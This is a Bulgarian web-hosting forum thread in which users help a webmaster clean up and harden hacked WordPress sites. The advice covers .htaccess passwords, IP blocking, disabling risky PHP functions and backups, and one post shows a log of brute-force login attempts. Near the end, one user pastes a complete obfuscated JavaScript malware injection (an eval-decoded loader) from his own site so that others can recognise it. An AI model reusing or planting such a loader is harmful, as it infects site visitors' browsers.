Новогодишен хак

[eLast]

Привет, колеги.

Получих страаааааашен подарък - новогодишен хак.

Имам няколко сайта закачени на 1 хостинг акаунт в Суперхостинга. Днес цъкам - 403. Отварям си мейла, пичовете от Супер-а писали така и така имало е достъп, имало накачени файлове. Спрели сайта, махнали каквото махнали и сега и аз да си огледам нещата и да пускаме пак сайтовете.

Та... питанката ми е, как да проверя 5 уордпреса дали някъде из някой, няма нещо плювнато и после да спя спокойно...

Видях, че има и други теми по въпроса има доста писано, чета ги и тях успоредно.

 

[alabam4eto]

От: Новогодишен хак

1. Пусни си антивирусната и си сканирай компютъра за някой малори вирус
2. След това смени паролите на хоста
3. http://sitecheck.sucuri.net/scanner/ сканирай сайта за качени вируси
4. Най-сигурно е да свалиш целия сайт на компа и да го минеш през антивирусната - при мен засича само вируси в .js но не и ако има php инжекции
5. Ако имаш свежа инсталация на лице може да използваш направо нея

 

[netsurfer]

От: Новогодишен хак

Най-лесния начин е да видиш последно редактираните файлове, в пъти по-лесно от това да сваляш на компа, да сканираш и т.н. ...

 

[mvmrik]

От: Новогодишен хак

Пазете си копие от файловете някъде, като стане нещо - просто замествате.

 

[eLast]

От: Новогодишен хак

Най-лесния начин е да видиш последно редактираните файлове, в пъти по-лесно от това да сваляш на компа, да сканираш и т.н. ...

Има ли някакъв лесен начин да открия тези последно коригирани, защото на акаунта има качени 5 уърдпреса и ще падне голямо цъкане ако трябва 1 по 1 да ги преглеждам и да се мъча да се сетя кога за последно съм ги барал аз.

 

[dertre]

От: Новогодишен хак

Има ли някакъв лесен начин да открия тези последно коригирани, защото на акаунта има качени 5 уърдпреса и ще падне голямо цъкане ако трябва 1 по 1 да ги преглеждам и да се мъча да се сетя кога за последно съм ги барал аз.

Логваш се през ФТП-то. Натискаш да ти подреди файловете по дата. Изкарва ти кои са последно променяни и датата на промяната им (ползвай FileZilla).

 

[alabam4eto]

От: Новогодишен хак

Без сканиране на PC за вирус и смяна на паролите може да си играеш да го правиш всеки ден това!

 

[eLast]

От: Новогодишен хак

В компа не намери нищо антивирусната. През ФТП-то гледам гледам и все далечни дати ми дава за последни промени. От Супер-а писаха, че са чистили файлове, но ме посъветваха и аз да поогледам преди да се пуснат сайтовете пак.

 

[white_pawn]

От: Новогодишен хак

Вчера и аз чистих точно Впрес блогове на споделен при СХ Ползвам го предимно за "тестове", качвам и по някоя тема да и разгледам функционалноста, че демотата всичките изглеждат супер като са нагласени. Ама понеже не са ми важни малко през пръсти го карам и друго не съм и очаквал.

Та мисълта ми беше, че гадовет са се налепили на 30-ти вечерта, а като разглеждах фтп логовете преди това за последно е имало сесия от чуждо ИП на 26-ти ноември. Тоест мизерията е била още тогава, просто чак сега му е влязъл в употреба на човечеца Та прегледай преди това какво е ставало. Преди 2-3 дена имаше тема, че файда няма да ги изчистиш ако не разберш от де ти е дошло.

 

[r.stefanov]

От: Новогодишен хак

Спираш достъпа до следните неща, дори до твоето айпи ако не се логваш често:

FTP, wp-admin, wp-login ако няма клиенти.

Забраняваш повечето скриптове, освен тези които се ползват от wordpress-a, добавяш и .htpassword за важните директории (тук е малко играчка да го направиш да не пречи на wordpress-a), спираш файл edit функцията през wordpress, искаш php-то на акаунта ти да върви с твоя юзер или поне suhosin мод да ти пуснат, оправяш си правата.


wtf is wrong with повторенията ми днес...

Ако от хоста се съгласят да пуснат пхп-то за твоя акаунт с твоя юзер направи wp-config.php с права 400.

Отново, ако от хоста разрешават, спри всички по-шантави пхп функции, които не използваш и се водят за "опасни" през htaccess или ги накарай те да ги спрат за твоя акаунт. Примерно exec, passthru, php_uname, phpAds_remoteInfo. Зависи кои ползваш де.

И си свиркаш

Естествено, пази си бекъп. Едва ли толкова често се правят промени. Аз 2 пъти в месеца rsync-вам автоматично целия wordpress с копие, което знам, че е чисто. От сумати сайтове да чукам на дърво до сега не съм имал ядове.

Разликата е, че сървъра е мой и имам пълен контрол над него.

П.П. - скоро ще пуснем сървър с nginx и php-fpm като ще има и whm/cPanel. Ако искаш дай 1-2 сайта да видиш, че там няма да имаш проблеми като при повечето споделени хостинг планове.

 

[eLast]

От: Новогодишен хак

74.117.220.10 - - [05/Jan/2013:23:03:43 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
221.132.33.130 - - [05/Jan/2013:23:03:45 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
37.1.223.19 - - [05/Jan/2013:23:03:46 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.16.88.174 - - [05/Jan/2013:23:03:47 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
46.45.169.180 - - [05/Jan/2013:23:03:48 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
184.106.168.183 - - [05/Jan/2013:23:03:48 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
94.23.27.29 - - [05/Jan/2013:23:03:49 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
50.57.174.146 - - [05/Jan/2013:23:03:49 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
46.32.254.132 - - [05/Jan/2013:23:04:08 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.205.107.173 - - [05/Jan/2013:23:04:09 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
46.45.161.250 - - [05/Jan/2013:23:04:47 +0200] "POST /wp-login.php HTTP/1.1" 403 - "http://сайта" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Сериозно нахалства. Какво да го правя?

@ leeyaa в сайта се пише всеки ден от 1-2 човека. Това със забраните и т.н. май няма да стане, а за паролата може ли малко по-подробно?

 

[alabam4eto]

От: Новогодишен хак

При стари версии на много CMS системи (тука говоря за Jooml предполагам, че и за wp е така) има дупки и лесно проникват XSS скриптове и разните му лайна. Не знам дали твоя случай е такъв, може и да не. За joomla версия 1.5 успешна защита е OSE Secure мисля че го има и за WP. Сподели и кода ... може да ориентира някого.

 

[eLast]

От: Новогодишен хак

Става дума за уърдпрес.

Сподели и кода ... може да ориентира някого.

Не разбрах за кой код става дума, за 403 ли? - "Access Denied/Forbidden" (уж трябва само моето ИП да има достъп до сайта).

 

[r.stefanov]

От: Новогодишен хак

E, след като дава 403 какъв ти е проблема?

Щом само 1-2 пишат, можеш да използваш htaccess да сложиш допълнителна парола за wp-admin и да им дадеш тези данни да се логват.

В /wp-admin/.htaccess

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /дир/дир2/.htpasswd
require valid-user

<LIMIT GET>
order deny,allow
deny from all
allow from някакво ip
allow from някакво ip2
</LIMIT>

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Как се прави .htpasswd в Windows (ще използвам xampp за пример в папка /апаче/бин има htpasswd.exe):

Start -> run -> cmd -> cd c:/xampp/apache/bin -> htpasswd -c .htpasswd username (ще те пита за парола два пъти).

 

[eLast]

От: Новогодишен хак

403 дава защото сега е ограничено само моето ИП да има достъп до сайта. Като сваля това ограничение, за да е видим сайта за НОРМАЛНИТЕ потребители, тея изчадия ще налазят вероятно пак.

 

[r.stefanov]

От: Новогодишен хак

Сложи парола както ти показах. И лимитирай опитите за логин (примерно 3 опита). Има добавки ако не знаеш как без plugin.

Също така ако сайта е български и не е нужно да бъде достъпен от чужбина можеш и това да ограничиш примерно с geoip. Ако пък не те устройва и ти се занимава, следиш айпитата и блокираш subnets на нарушителите.

iptables -A INPUT -s 192.168.100.0/24 -j DROP

А кой чука на вратата можеш да видиш с

grep 403 /dir/dir2/site-access.log

също и

cat /dir/dir2/site-error.log

Гледаш за нещо от сорта на:

[Sun Jan 06 01:26:15 2013] [error] [client 158.58.216.11] user not found: /wp-admin/css/colors-fresh.min.css, referer: http://rstefanov.com/wp-login.php

[Sun Jan 06 01:37:48 2013] [error] [client 158.58.216.11] user юзер: authentication failure for "/wp-admin/css/wp-admin.min.css": Password Mismatch, referer: http://rstefanov.com/wp-login.php

 

[eLast]

От: Новогодишен хак

Имам няколко реферери от http://www. forexhm .ru/

А другите са си от мои вътрешни страници, което не знам как става, след като има 403.

 

[alabam4eto]

От: Новогодишен хак

Случайно вируса ти в сайта да изглежда по подобен начин ???

v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg){w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,107,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,32,31,30,107,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,104,112,111,105,116,117,112,115,46,113,115,47,98,109,117,109,114,49,49,44,112,103,110,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,31,30,32,106,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,105,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,32,31,30,105,101,30,40,32,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,107,38,39,41,31,121,13,9,30,32,31,30,32,31,30,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,107,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,32,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109,114,66,120,71,100,39,37,107,38,39,46,96,110,112,100,108,100,66,102,105,107,98,40,106,39,59,12,8,32,31,30,32,124,11,10,124,39,40,40,57);}w=f;s=[];for(i=0;-i+444!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)</script>

 

[eLast]

От: Новогодишен хак

За сега не съм срещал нещо подобно, но от хоста писаха, че са махали някакви файлове, които не знам какви са били.

Какво представлява цитираното?

 

[alabam4eto]

От: Новогодишен хак

Това е код на вирус, който ми беше лепнат в началото на декември, криптиран е и е вкаран, чрез XSS инжекция добре е да се упдейтват старите версии на CMS системите